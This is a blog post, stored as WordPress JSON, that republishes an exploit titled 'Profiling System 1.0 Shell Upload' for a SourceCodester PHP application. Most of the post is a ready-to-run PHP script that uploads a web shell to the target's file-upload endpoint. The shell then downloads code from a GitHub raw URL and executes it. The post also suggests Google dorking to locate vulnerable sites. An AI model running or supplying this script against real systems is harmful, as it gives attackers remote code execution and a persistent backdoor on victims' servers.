{"id":59615,"date":"2024-09-11T19:59:54","date_gmt":"2024-09-11T16:59:54","guid":{"rendered":"https:\/\/packetstormsecurity.com\/files\/181447\/ps10-shell.txt"},"modified":"2024-09-11T19:59:54","modified_gmt":"2024-09-11T16:59:54","slug":"profiling-system-1-0-shell-upload","status":"publish","type":"post","link":"https:\/\/afaghhosting.net\/blog\/profiling-system-1-0-shell-upload\/","title":{"rendered":"Profiling System 1.0 Shell Upload"},"content":{"rendered":"<p>=============================================================================================================================================<br \/>| # Title : Profiling System 1.0 code injection Vulnerability |<br \/>| # Author : indoushka |<br \/>| # Tested on : windows 10 Fr(Pro) \/ browser : Mozilla firefox 129.0.1 (64 bits) |<br \/>| # Vendor : https:\/\/www.sourcecodester.com\/php\/11222\/profiling-system-human-resource-management.html |<br \/>=============================================================================================================================================<\/p>\n<p>poc :<\/p>\n[+] Dorking \u0130n Google Or Other Search Enggine.<\/p>\n[+] This payload injects php code of your choice into an SHELL.php file. <\/p>\n[+] Line 26<br \/>Line 35<\/p>\n[+] change the path of the script folder.<\/p>\n[+] save payload as poc.php<\/p>\n[+] usage from cmd : C:\\www\\test&gt;php 1.php 127.0.0.1<\/p>\n[+] payload : <\/p>\n<p>&lt;?php<\/p>\n<p>function file_upload($target_ip) {<br \/>$file_name = &#8220;indoushka.php&#8221;;<br \/>$webshell_payload = &#8220;&lt;?php<br \/>\\$url = &#8216;https:\/\/raw.githubusercontent.com\/indoushka\/txt\/main\/indoushka.txt&#8217;;<br \/>\\$ch = curl_init();<br \/>curl_setopt(\\$ch, CURLOPT_URL, \\$url);<br \/>curl_setopt(\\$ch, CURLOPT_RETURNTRANSFER, true);<br \/>\\$output = curl_exec(\\$ch);<br \/>curl_close(\\$ch);<br \/>if (\\$output) {<br \/>include &#8216;data:\/\/text\/plain;base64,&#8217; . base64_encode(\\$output);<br \/>}<br \/>?&gt;&#8221;;<\/p>\n<p>$post_fields = array(<br \/>&#8216;upload&#8217; =&gt; &#8221;,<br \/>&#8216;per_file&#8217; =&gt; new CURLFile(&#8216;data:\/\/text\/plain;base64,&#8217; . base64_encode($webshell_payload), &#8216;application\/x-php&#8217;, $file_name),<br \/>&#8216;per_name&#8217; =&gt; &#8216;inouva&#8217;,<br \/>&#8216;file_name&#8217; =&gt; &#8216;123&#8217;,<br \/>&#8216;qty&#8217; =&gt; &#8216;1&#8217;<br \/>);<\/p>\n<p>$ch = curl_init();<br \/>curl_setopt($ch, CURLOPT_URL, &#8220;http:\/\/$target_ip\/ProfilingSystem\/add_file_query.php&#8221;);<br \/>curl_setopt($ch, CURLOPT_POST, 1);<br \/>curl_setopt($ch, CURLOPT_POSTFIELDS, $post_fields);<br \/>curl_setopt($ch, CURLOPT_RETURNTRANSFER, true);<\/p>\n<p>$response = curl_exec($ch);<br \/>curl_close($ch);<\/p>\n<p>echo &#8220;(+) Shell uploaded successfully.\\n&#8221;;<br \/>echo &#8220;(+) Access the shell at: http:\/\/$target_ip\/ProfilingSystem\/uploads\/$file_name\\n&#8221;;<br \/>}<\/p>\n<p>if ($argc != 2) {<br \/>echo &#8220;(+) Usage: php &#8221; . $argv[0] . &#8221; &lt;target ip&gt;\\n&#8221;;<br \/>echo &#8220;(+) Example: php &#8221; . $argv[0] . &#8221; 10.0.0.1\\n&#8221;;<br \/>exit(-1);<br \/>}<\/p>\n<p>$target_ip = $argv[1];<br \/>file_upload($target_ip);<\/p>\n<p>Greetings to :============================================================<br \/>jericho * Larry W. Cashdollar * LiquidWorm * Hussin-X * D4NB4R * CraCkEr |<br \/>==========================================================================<\/p>\n","protected":false},"excerpt":{"rendered":"<p>=============================================================================================================================================| # Title : Profiling System 1.0 code injection Vulnerability || # Author : indoushka || # Tested on : windows 10 Fr(Pro) \/ browser : Mozilla firefox 129.0.1 (64 bits) || # Vendor : https:\/\/www.sourcecodester.com\/php\/11222\/profiling-system-human-resource-management.html |============================================================================================================================================= poc : [+] Dorking \u0130n Google Or Other Search Enggine. [+] This payload injects php code of your &hellip;<\/p>\n","protected":false},"author":1,"featured_media":0,"comment_status":"closed","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"footnotes":""},"categories":[26],"tags":[],"class_list":["post-59615","post","type-post","status-publish","format-standard","hentry","category-vulnerability"],"_links":{"self":[{"href":"https:\/\/afaghhosting.net\/blog\/wp-json\/wp\/v2\/posts\/59615","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/afaghhosting.net\/blog\/wp-json\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/afaghhosting.net\/blog\/wp-json\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/afaghhosting.net\/blog\/wp-json\/wp\/v2\/users\/1"}],"replies":[{"embeddable":true,"href":"https:\/\/afaghhosting.net\/blog\/wp-json\/wp\/v2\/comments?post=59615"}],"version-history":[{"count":0,"href":"https:\/\/afaghhosting.net\/blog\/wp-json\/wp\/v2\/posts\/59615\/revisions"}],"wp:attachment":[{"href":"https:\/\/afaghhosting.net\/blog\/wp-json\/wp\/v2\/media?parent=59615"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/afaghhosting.net\/blog\/wp-json\/wp\/v2\/categories?post=59615"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/afaghhosting.net\/blog\/wp-json\/wp\/v2\/tags?post=59615"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}